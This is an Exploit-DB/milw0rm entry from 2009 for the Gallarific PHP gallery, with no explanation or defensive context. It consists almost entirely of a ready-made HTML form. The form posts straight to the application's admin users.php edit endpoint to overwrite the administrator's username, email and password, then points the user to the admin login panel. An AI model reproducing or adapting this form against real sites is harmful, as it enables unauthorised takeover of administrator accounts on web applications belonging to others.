Gallarific user.php Arbirary Change Admin Information Exploit

2009-05-26T00:00:00
ID EDB-ID:8796
Type exploitdb
Reporter TiGeR-Dz
Modified 2009-05-26T00:00:00

Description

Gallarific (user.php) Arbirary Change Admin Information Exploit. Webapps exploit for php platform

                                        
                                             <titre> gallarific exploit </titre>
 <body bgcolor="#000000">

 <div id="content">
  <h2><font color="#FFFFFF">change password </font></h2>
  <form enctype="multipart/form-data" action="http://www.gallarific.com/demo/gadmin/users.php?task=edit&id=13" method="post" onsubmit="return userFormCheck()">
  <input type="hidden" name="id" value="13">
  <div id="error" class="er" style="display:none"></div>
  <table class="fm" width="408">
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  Founder :</font></td>
  <td class="fc"><input type="text" name="username" id="username" class="if" value="TiGeR-Dz"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5"> Email:</font></td>
  <td class="fc"><input type="text" name="email" id="email" class="if" value="tiger.dz@live.com.com"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font size="5" color="#FFFFFF">Script:</font></td>
  <td class="fc">
  <input type="text" name="password" id="password" class="if" value="gallarific php image gallery software" size="31"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  HOME</font></td>
  <td class="fc">h<font size="4" color="#FFFFFF">http://www.gallarific.com/</font></td>
  </tr>
  </table>
  <p align="center"><input class="su" type="submit" value="Go to change password »"></p>
  <p><font color="#FFFFFF" size="4">Note:after change password go to 
  login in control admin panel :</font></p>
  <p><font size="4" color="#FFFFFF">http://www.gallarific.com/demo/gadmin/index.php</font></p>
  <p align="center"> </p>
  <p align="center"> </p>
  </form>
  </div>
 <div id="help">
   </div>
 <br>
</body>
</html>

# milw0rm.com [2009-05-26]